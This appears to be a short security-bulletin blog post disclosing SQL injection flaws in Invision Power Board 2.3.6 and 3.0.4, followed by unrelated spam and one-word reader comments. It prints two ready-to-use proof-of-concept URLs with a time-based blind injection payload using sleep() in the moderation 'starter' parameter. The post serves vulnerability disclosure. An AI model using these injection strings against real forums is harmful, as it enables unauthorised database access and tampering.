Dec 06

Invision Power Board SQL Injection Vulnerabilities

By jason Security Bulletin Add comments

Version:

Invision Power Services Invision Power Board 2.3.6
Invision Power Services Invision Power Board 3.0.4

Description:

The attacker can exploit the SQL-injection vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Test

http://www.example.com/?app=forums&module=moderate&section=moderate&f=1&do=prune_move&df=3&pergo=50&dateline=0&state=open&ignore_pin=1&max=0&s
tarter=1%20AND%20starter_id=1%20OR%20substr(version(),1,1)=5%20AND%20sleep(15)%20–%20skip%20&auth_key=c4276b77602767228faa9760eb4a5abd

http://www.example.com/forum/?act=mod&f=1&CODE=prune_move&df=3&pergo=50&dateline=0&state=open&ignore_pin=1&max=0&starter=1%20AND%20starter_id=1%20OR
%20substr(version(),1,1)=5%20AND%20sleep(16)%20–%20skip%20&auth_key=040c4a6e768d626b4c05a4bb0fbf315c

4 Responses to “Invision Power Board SQL Injection Vulnerabilities”

  1. Cefolopaf says:
    06/08/2010 at 5:20 pm

    Hello I am currently out of work. I have applied to most of the job sites more times than I’d care to recall and applied to 100s of positions. However, i have not been able to find a single good response to my resumes. If anyone knows about any particular place where i can look for a good job, please reply me with the location details. I will be thankful to you for your early response.

  2. Drebrarcasy says:
    02/20/2010 at 9:36 am

    Simply wanted to say hi to everybody here. It’s my very first posting at this point.

    It actually looks like the mods involved with the forum sure do a awesome job.

    I want to learn about alot of stuff here also I will support other people just as much as I can.

  3. Kostya says:
    01/15/2010 at 5:39 pm

    Хм..

  4. Shadow says:
    12/29/2009 at 2:18 pm

    Норм

Leave a Reply

preload preload preload